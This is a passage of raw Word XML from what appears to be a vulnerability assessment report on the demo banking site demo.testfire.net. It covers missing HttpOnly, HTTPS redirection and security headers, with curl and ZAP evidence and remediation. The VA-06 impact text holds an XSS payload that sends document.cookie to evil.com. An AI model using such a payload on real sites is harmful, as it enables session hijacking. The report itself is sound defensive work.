          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement cookie prefixes: __Secure- prefix enforces Secure flag at browser level.</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OWASP Session Management Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-614: https://cwe.mitre.org/data/definitions/614.html</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VA-06  |  Insecure Session Cookie — Missing HttpOnly Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="E36C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A07:2021 – Identification and Authentication Failures</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CWE-1004: Sensitive Cookie Without HttpOnly Flag</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JSESSIONID session cookie is set without the HttpOnly flag. The HttpOnly attribute prevents client-side JavaScript from accessing the cookie via document.cookie. Without it, any successful Cross-Site Scripting (XSS) attack can immediately exfiltrate the session token to an attacker-controlled server.</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http://demo.testfire.net/bank/login.aspx</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Set-Cookie: JSESSIONID=ABCDEF1234567890; Path=/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># NOTE: 'HttpOnly' flag is ABSENT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Browser DevTools Console Test:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  &gt; document.cookie</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  'JSESSIONID=ABCDEF1234567890'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  # Cookie is accessible via JavaScript — HttpOnly not set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OWASP ZAP Alert:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Alert: Cookie No HttpOnly Flag</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Risk:  Medium | Parameter: JSESSIONID</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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The absence of HttpOnly means that if any XSS vulnerability exists in the application (likely, given no CSP), attackers can steal session tokens with a single line of JavaScript. A simple attack: &lt;script&gt;new Image().src='https://evil.com/?c='+document.cookie&lt;/script&gt; would silently send the victim's session token to the attacker.</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Add the HttpOnly flag to all session cookies: Set-Cookie: JSESSIONID=...; Path=/; Secure; HttpOnly; SameSite=Strict</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In Tomcat, use: &lt;session-config&gt;&lt;cookie-config&gt;&lt;http-only&gt;true&lt;/http-only&gt;&lt;/cookie-config&gt;&lt;/session-config&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit all application cookies and apply HttpOnly where JavaScript access is not required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement a Web Application Firewall (WAF) as a defence-in-depth measure against XSS.</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OWASP HttpOnly: https://owasp.org/www-community/HttpOnly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-1004: https://cwe.mitre.org/data/definitions/1004.html</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VA-07  |  No HTTPS Enforcement — HTTP Accessible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="E36C0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A02:2021 – Cryptographic Failures</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CWE-319: Cleartext Transmission of Sensitive Information</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application is fully accessible over unencrypted HTTP on port 80. There is no automatic redirection from HTTP to HTTPS, meaning users who navigate to http://demo.testfire.net are never upgraded to a secure connection. Sensitive data including credentials and session tokens is transmitted in cleartext.</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-v http://demo.testfire.net/ 2&gt;&amp;1 | grep -E 'HTTP|Location'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; GET / HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt; HTTP/1.1 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Expected: 301 Moved Permanently → https://demo.testfire.net/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Actual:   200 OK — full application served over HTTP</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Nmap scan confirms:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  80/tcp  open  http  (Application fully accessible, no redirect)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  443/tcp open  ssl   (HTTPS also available but not enforced)</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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">All traffic between the user and the server is transmitted as plaintext text over HTTP. On any shared or monitored network, an attacker can use tools like Wireshark to read every HTTP request and response, including login forms with usernames and passwords. This is especially severe for a banking application where financial data is involved.</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Configure the web server to return a 301 Permanent Redirect from HTTP to HTTPS for all requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache/Tomcat: Add a redirect rule that forwards all port-80 traffic to port 443.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Combine with HSTS (VA-02) to ensure browsers never attempt HTTP connections in future.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify using curl that HTTP returns 301 and not 200: curl -I http://demo.testfire.net</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test all internal links and resources to ensure they use HTTPS (avoid mixed-content warnings).</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Mozilla SSL Configuration Generator: https://ssl-config.mozilla.org/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Transport Layer Security Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Security_Cheat_Sheet.html</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VA-08  |  Missing X-Content-Type-Options Header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="236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A05:2021 – Security Misconfiguration</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CWE-16: Configuration</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X-Content-Type-Options: nosniff header is absent from HTTP responses. This header prevents browsers from MIME-sniffing a response away from the declared Content-Type. Without it, browsers may interpret a response as a different content type (e.g., treating a text file as executable JavaScript), enabling MIME-confusion attacks.</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 | grep -i 'x-content-type'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># (no output — header is absent)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OWASP ZAP Alert:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Alert: X-Content-Type-Options Header Missing</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Risk:  Low</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Solution: Add 'X-Content-Type-Options: nosniff' to all responses.</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20"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">MIME-sniffing attacks are more theoretical than immediately exploitable in modern browsers, but the absence of this header represents a defence-in-depth failure. Combined with other vulnerabilities (like file upload without type validation), it could enable an attacker to execute malicious files by tricking the browser into misidentifying their content type.</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Add the following header to all HTTP responses: X-Content-Type-Options: nosniff</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In Apache Tomcat, add to web.xml or use a filter to inject the header globally.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a one-line fix with no functional impact on the application.</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MDN X-Content-Type-Options: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Content-Type-Options</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5C" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">VA-09  |  Missing Referrer-Policy Header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="236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RISK: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OWASP Category</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A05:2021 – Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:left w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:bottom w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:right w:val="single" w:color="2E75B6" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D9E8F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A5C"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:left w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:bottom w:val="single" w:color="2E75B6" w:sz="1"/>
              <w:right w:val="single" w:color="2E75B6" w:sz="1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-116: Information Exposure Through Referrer Header</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Referrer-Policy header is absent. Without this header, the browser defaults to sending the full URL of the current page in the Referer header when navigating to external sites. For a banking application, this could inadvertently leak internal URL parameters, account identifiers, or transaction details to third-party analytics or CDN providers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence / Tool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curl -sI http://demo.testfire.net | grep -i 'referrer'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># (no output — header is absent)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Default browser behaviour without Referrer-Policy:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Referer: http://demo.testfire.net/bank/account?id=12345&amp;action=transfer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  (Full URL sent to any external resource loaded by the page)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rP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20"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Low direct exploit risk, but sensitive URL parameters (account IDs, session tokens in URLs) could be leaked to third-party services. For a banking application, even metadata about user activity could be valuable to attackers for targeted social engineering.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Add: Referrer-Policy: strict-origin-when-cross-origin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">For maximum privacy: Referrer-Policy: no-referrer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Review all pages to ensure sensitive data is never transmitted in URL query parameters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MDN Referrer-Policy: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referrer-Policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>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
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Risk Summary &amp; Business Impact</w:t>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The following table summarises all findings by risk level, associated OWASP category, and business impact. Risk levels are assigned based on the likelihood of exploitation combined with the potential impact to confidentiality, integrity, and availability (CIA triad).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Impact Summary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CSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Enables XSS execution → session hijacking, credential theft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HSTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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SSL-stripping attacks on shared networks → cleartext credential exposure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X-Frame-Options</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Clickjacking on login page → unauthorized transactions, credential theft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Server Version Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
